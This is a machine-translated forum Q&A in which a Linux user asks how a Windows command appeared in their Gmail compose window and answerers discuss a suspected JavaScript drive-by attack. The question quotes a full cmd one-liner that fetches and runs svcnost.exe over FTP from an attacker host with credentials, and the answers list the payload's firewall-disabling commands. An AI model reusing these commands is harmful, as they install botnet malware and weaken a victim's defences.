如何确定我的Linux计算机是否被黑客入侵?


128

我的家用PC通常是打开的,但显示器却关闭了。今天傍晚,我下班回家后,发现了一次看上去很像黑客尝试的事情:在我的浏览器中,我的Gmail已打开(就是我),但是它处于撰写模式,并且该TO字段中包含以下内容:

md / c echo open cCTeamFtp.yi.org 21 >> ik&echo用户ccteam10 765824 >> ik&echo二进制文件>> ik&echo get svcnost.exe >> ik&echo bye >> ik&ftp -n -v -s:ik&del ik &svcnost.exe&exit echo您已拥有

在我看来,这看起来像Windows命令行代码,并且代码的md开头加上Gmail处于撰写模式这一事实,很明显表明有人试图运行cmd命令。我猜我很幸运,实际上我没有在此PC上运行Windows,但是我有其他人可以运行。这是我第一次发生这样的事情。我不是Linux专家,当时我没有运行除Firefox之外的任何其他程序。

我绝对确定我没有写这个,并且没有人在我的电脑前。另外,我最近将自己的Google密码(以及所有其他密码)更改为类似的密码,vMA8ogd7bv所以我认为没有人入侵了我的Google帐户。

刚刚发生了什么?当不是老太婆运行恶意软件的老Windows计算机而不是最近安装的新Ubuntu时,有人如何在我的计算机上敲击键盘?

更新:
让我解决一些要点和问题:

  • 我在奥地利的乡下。我的WLAN路由器运行WPA2 / PSK以及不在词典中的中等强度密码。必须是蛮力的,距离这里不到50米;它不太可能被黑客入侵。
  • 我使用的是USB有线键盘,因此再也不太可能有人可以入侵它。
  • 当时我没有使用计算机。我在工作时只是在家里闲逛。这是一台安装在显示器上的台式计算机,因此我很少关闭它。
  • 这台机器只有两个月大,只能运行Ubuntu,而且我没有使用奇怪的软件或访问奇怪的网站。主要是Stack Exchange,Gmail和报纸。没有游戏。Ubuntu将保持最新状态。
  • 我不知道正在运行任何VNC服务;我当然还没有安装或启用它。我也没有启动任何其他服务器。我不确定默认情况下是否在Ubuntu中运行任何程序吗?
  • 我知道Gmail帐户活动中的所有IP地址。我相当确定Google不是入门工具。
  • 我找到了“ 日志文件查看器”,但不知道要查找什么。救命?

我真正想知道的是,真正让我感到不安全的是:互联网上的任何人如何在我的计算机上生成击键?我如何才能避免这种情况,而不必全神贯注呢?我不是Linux极客,而是父亲,他对Windows迷恋了20多年,对它感到厌倦。在过去的18年多的在线时间里,我从未亲自看到过任何黑客尝试,因此这对我来说是新的。


4
是否有其他人可以访问您的计算机,或者您有一个很旧的无线键盘?另外,Ubuntu具有内置的VNC服务器。如果该命令处于活动状态,则可能已连接某个地方的随机脚本并假定它是Windows计算机,从而发送了WIN + R,cmd击键……
TuxRug

29
@torbengb:您的帖子真的吓到我了……
Mehrdad

9
您的无线网络上还有其他计算机吗?如果入侵者破坏了他们的安全性,那将使他“进入”您的本地网络,这可能导致以各种方式破解Ubuntu盒子。
CarlF 2011年

4
@muntoo ...并且'确保您没有在任何地方写下这些内容,也不要使用任何应用程序来管理它们,对吗?让我们不开始密码重击;至少我的密码不是password:-)
Torben Gundtofte-Bruun 2011年

6
你有猫吗?
扎基

Answers:


66

我怀疑你有什么需要担心的。极有可能是JavaScript攻击试图通过下载进行驱动。如果您担心这种情况的发生,请开始使用NoScriptAdBlock Plus Firefox附加组件。

即使访问值得信赖的网站,您也不安全,因为它们运行来自第三方广告商的JavaScript代码,这可能是恶意的。

我抓起它并在VM中运行它。它安装了mirc,这是状态日志... http://pastebin.com/Mn85akMk

这是一种自动攻击,试图使您下载mIRC并加入一个僵尸网络,该僵尸网络会将您变成垃圾邮件机器人。它使我的VM加入并连接到多个不同的远程地址,其中一个是autoemail-119.west320.com

在Windows 7中运行它,我必须接受UAC提示并允许它通过防火墙访问。

在其他论坛上似乎有无数关于此确切命令的报告,甚至有人说一个torrent文件在完成下载后便试图执行它...我不确定这怎么可能。

我自己没有使用过它,但是它应该能够向您显示当前的网络连接,以便您可以查看是否连接到不正常的网络:http : //netactview.sourceforge.net/download.html


10
嗯,为什么所有注释(甚至是发现脚本试图打开一个窗口的高度相关cmd注释)都被删除!
BlueRaja-Danny Pflughoeft13年

如果我刚开始使用uBlock Origin,我会免受这种攻击吗?
RobotUnderscore

42

我同意@ jb48394的看法,这可能是JavaScript漏洞利用,就像如今的其他一切一样。

它试图打开一个cmd窗口(请参阅@torbengb的注释并运行一个恶意命令,而不是仅在后台谨慎下载木马,这表明它利用了Firefox中的一些漏洞,允许其输入击键。无法运行代码。

这也解释了为什么这个漏洞,这是明确专门编写用于Windows,也将在Linux下工作:火狐运行的JavaScript在所有OS'es以同样的方式 (至少,它会尝试:)) 。如果它是由Windows上的缓冲区溢出或类似漏洞利用引起的,则它将导致程序崩溃。

至于JavaScript代码的来源-可能是恶意的Google广告(广告整天在Gmail中循环)。这会不会 第一 时间


4
不错的参考。
kizzx2 2011年

9
仅供参考,对于撇油器,最后一个“链接”实际上是五个单独的链接。
流行

如果它真的是Javascript漏洞,那将非常令人震惊,因为我的Firefox通常会保持开放状态数天。但是,您需要调用特殊的API才能将密钥发送到Windows下的另一个系统,并且可能在Linux下发送另一个系统调用(如果存在)。由于发送击键不是正常的Javascript操作,因此我怀疑Firefox是否会为此实现跨平台调用。
billc.cn 2011年

1
@ billc.cn:我相信不管使用什么操作系统,写入PS / 2键盘缓冲区的工作原理都相同
BlueRaja-Danny Pflughoeft

12

我在另一台Linux机器上发现了类似的攻击。看来这是Windows的某种FTP命令。


8
更准确地说,它ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe使用Windows ftp命令行工具下载并运行文件。
grawity 2011年

也可以在pastebin上找到它pastebin.com/FXwRpKH4
Shekhar,

这是有关网站的信息whois.domaintools.com/216.210.179.67
Shekhar

9
这是一个WinRAR SFX软件包,其中包含可移植的mIRC安装和一个名为“ DriverUpdate.exe”的文件。DriverUpdate.exe执行(至少)两个shell命令:netsh防火墙设置opmode disabletaskkill / F / IM VCSPAWN.EXE / T它还尝试(我认为)将die-freesms-seite.com添加到Internet Explorer可信区域和代理绕过。
安德鲁·兰伯特

5

这不能回答您的全部问题,但是可以在日志文件中查找失败的登录尝试。

如果您的日志中尝试失败的次数超过大约五次,则有人试图破解root。如果root在您离开计算机时成功尝试登录,请立即更改密码!!我的意思是现在!最好为字母数字形式,大约10个字符。

使用您收到的消息(echo命令),这听起来确实像是一些不成熟的脚本小子。如果是真正的黑客知道他在做什么,那么您可能仍然不会知道。


2
我同意这显然是非常业余的。至少他们不应该在最后把你所有的回声放在首位。让我想知道是否有“真正的黑客”通过?或者实际上我应该问,有多少?
Torben Gundtofte-Bruun 2011年

1
@torgengb:如果命令在Windows命令提示符下运行,您将看不到回显(因为&exit
BlueRaja-Danny Pflughoeft

-1

whois 报告west320.com由Microsoft拥有。

UPnPVino(系统->首选项->远程桌面)与弱的Ubuntu密码结合使用了吗?

您是否使用了任何非标准存储库?

DEF CON每年都会举办一次Wi-Fi竞赛,涉及可到达Wi-Fi接入点的距离-我最近听说是250英里。

如果您真的想害怕,请查看Zeus僵尸网络的command-n-control中心的屏幕截图。没有机器是安全的,但是Linux上的Firefox比其他机器更安全。如果您运行SELinux甚至更好。


1
此漏洞的作者显然无意在Linux上运行此漏洞,因此我怀疑它与易受攻击的gnome实用程序或弱密码有关(此外,OP已经提到他具有安全密码)
BlueRaja-Danny Pflughoeft

实际上,他没有提到拥有Ubuntu密码,只有gmail和无线密码。一个运行metasploit的孩子可能甚至不了解Linux,他只是看到VNC。这很可能是JavaScript攻击。
rjt 2012年
By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.